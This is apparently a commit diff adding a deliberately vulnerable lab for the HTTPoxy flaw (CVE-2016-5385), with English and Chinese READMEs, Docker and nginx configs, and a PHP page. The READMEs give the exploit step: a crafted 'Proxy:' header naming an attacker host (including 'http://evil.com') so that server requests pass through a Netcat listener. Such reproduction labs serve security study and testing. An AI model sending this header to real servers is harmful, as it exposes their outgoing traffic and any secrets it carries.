first commit

2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
--- a/cgi/CVE-2016-5385/1.png
+++ b/cgi/CVE-2016-5385/1.png
--- a/cgi/CVE-2016-5385/2.png
+++ b/cgi/CVE-2016-5385/2.png
--- a/cgi/CVE-2016-5385/3.png
+++ b/cgi/CVE-2016-5385/3.png
--- a/cgi/CVE-2016-5385/README.md
+++ b/cgi/CVE-2016-5385/README.md
@@ -0,0 +1,53 @@
+# CGI Application Environment Variable Injection by HTTPoxy (CVE-2016-5385)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+httpoxy is a set of vulnerabilities that affect application code running in CGI, or CGI-like environments. It comes down to a simple namespace conflict:
+
+- RFC 3875 (CGI) puts the HTTP Proxy header from a request into the environment variables as `HTTP_PROXY`
+- `HTTP_PROXY` is a popular environment variable used to configure an outgoing proxy
+
+This leads to a remotely exploitable vulnerability. See <https://httpoxy.org> for further principles description.
+
+CVE-2016-5385 is one of CVEs that assign for HTTPoxy, here are the full CVEs list:
+
+- CVE-2016-5385: PHP
+- CVE-2016-5386: Go
+- CVE-2016-5387: Apache HTTP Server
+- CVE-2016-5388: Apache Tomcat
+- CVE-2016-6286: spiffy-cgi-handlers for CHICKEN
+- CVE-2016-6287: CHICKEN’s http-client
+- CVE-2016-1000104: mod_fcgi
+- CVE-2016-1000105: Nginx cgi script
+- CVE-2016-1000107: Erlang inets
+- CVE-2016-1000108: YAWS
+- CVE-2016-1000109: HHVM FastCGI
+- CVE-2016-1000110: Python CGIHandler
+- CVE-2016-1000111: Python Twisted
+- CVE-2016-1000212: lighttpd
+
+## Vulnerable environment
+
+Execute following command to start a Web application depending on PHP 5.6.23 and GuzzleHttp 6.2.0.
+
+```
+docker compose up -d
+```
+
+This [Web page](www/index.php) get its origin IP address at `http://httpbin.org/get`:
+
+![](1.png)
+
+At this moment, hostname IP is equal to original IP, no HTTP proxy.
+
+## Exploit
+
+Send a request with a crafted HTTP header that contains a available HTTP proxy address: `Proxy: http://*.*.122.65:8888/`:
+
+![](2.png)
+
+It is obvious that the original address in the response has become the IP address of the proxy server.
+
+Start a Netcat server at the `*.*.122.65` instead of HTTP proxy, we can capture the original request:
+
+![](3.png)
--- a/cgi/CVE-2016-5385/README.zh-cn.md
+++ b/cgi/CVE-2016-5385/README.zh-cn.md
@@ -0,0 +1,55 @@
+# CGI应用环境变量注入漏洞（CVE-2016-5385）
+
+根据RFC 3875规定，CGI（fastcgi）要将用户传入的所有HTTP头都加上`HTTP_`前缀放入环境变量中，而恰好大多数类库约定俗成会提取环境变量中的`HTTP_PROXY`值作为HTTP代理地址。于是，恶意用户通过提交`Proxy: http://evil.com`这样的HTTP头，将使用缺陷类库的网站的代理设置为`http://evil.com`，进而窃取数据包中可能存在的敏感信息。
+
+PHP5.6.24版本修复了该漏洞，不会再将`Proxy`放入环境变量中。本环境使用PHP 5.6.23为例。
+
+当然，该漏洞不止影响PHP，所有以CGI或Fastcgi运行的程序理论上都受到影响。CVE-2016-5385是PHP的CVE，HTTPoxy所有的CVE编号如下：
+
+- CVE-2016-5385: PHP
+- CVE-2016-5386: Go
+- CVE-2016-5387: Apache HTTP Server
+- CVE-2016-5388: Apache Tomcat
+- CVE-2016-6286: spiffy-cgi-handlers for CHICKEN
+- CVE-2016-6287: CHICKEN’s http-client
+- CVE-2016-1000104: mod_fcgi
+- CVE-2016-1000105: Nginx cgi script
+- CVE-2016-1000107: Erlang inets
+- CVE-2016-1000108: YAWS
+- CVE-2016-1000109: HHVM FastCGI
+- CVE-2016-1000110: Python CGIHandler
+- CVE-2016-1000111: Python Twisted
+- CVE-2016-1000212: lighttpd
+
+参考链接：
+
+- https://httpoxy.org/
+- http://www.laruence.com/2016/07/19/3101.html
+
+## 环境搭建
+
+启动一个基于PHP 5.6.23 + GuzzleHttp 6.2.0的应用：
+
+```
+docker compose up -d
+```
+
+Web页面原始代码：[index.php](www/index.php)
+
+## 漏洞复现
+
+正常请求`http://your-ip:8080/index.php`，可见其Origin为当前请求的服务器，二者IP相等：
+
+![](1.png)
+
+在其他地方启动一个可以正常使用的http代理，如`http://*.*.122.65:8888/`。
+
+附带`Proxy: http://*.*.122.65:8888/`头，再次访问`http://your-ip:8080/index.php`：
+
+![](2.png)
+
+如上图，可见此时的Origin已经变成`*.*.122.65`，也就是说真正进行HTTP访问的服务器是`*.*.122.65`，也就是说`*.*.122.65`已经将正常的HTTP请求代理了。
+
+在`*.*.122.65`上使用NC，就可以捕获当前请求的数据包，其中可能包含敏感数据：
+
+![](3.png)
--- a/cgi/CVE-2016-5385/docker-compose.yml
+++ b/cgi/CVE-2016-5385/docker-compose.yml
@@ -0,0 +1,15 @@
+version: '2'
+services:
+ nginx:
+   image: nginx:1
+   volumes:
+    - ./www/index.php:/usr/share/nginx/html/index.php
+    - ./nginx/default.conf:/etc/nginx/conf.d/default.conf
+   depends_on:
+    - php
+   ports:
+    - "8080:80"
+ php:
+   image: vulhub/php:httpoxy
+   volumes: 
+    - ./www/index.php:/var/www/html/index.php
--- a/cgi/CVE-2016-5385/nginx/default.conf
+++ b/cgi/CVE-2016-5385/nginx/default.conf
@@ -0,0 +1,26 @@
+server {
+	listen 80 default_server;
+	listen [::]:80 default_server;
+
+	root /usr/share/nginx/html;
+
+	index index.html index.php;
+
+	server_name _;
+
+	location / {
+		try_files $uri $uri/ =404;
+	}
+
+	location ~ [^/]\.php(/|$) {
+		fastcgi_index index.php;
+
+		include fastcgi_params;
+
+		fastcgi_param  REDIRECT_STATUS    200;
+		fastcgi_param  SCRIPT_FILENAME /var/www/html$fastcgi_script_name;
+		fastcgi_param  DOCUMENT_ROOT /var/www/html;
+		fastcgi_pass php:9000;
+	}
+
+}
--- a/cgi/CVE-2016-5385/www/index.php
+++ b/cgi/CVE-2016-5385/www/index.php
@@ -0,0 +1,20 @@
+<?php
+
+require __DIR__ . '/vendor/autoload.php';
+
+use GuzzleHttp\Client;
+
+header('Content-Type: application/json; charset=utf-8');
+
+$client = new Client([
+    // Base URI is used with relative requests
+    'base_uri' => 'http://httpbin.org',
+    // You can set any number of default request options.
+    'timeout'  => 2.0,
+]);
+
+$response = $client->get('http://httpbin.org/get');
+
+$body = $response->getBody();
+
+echo $body;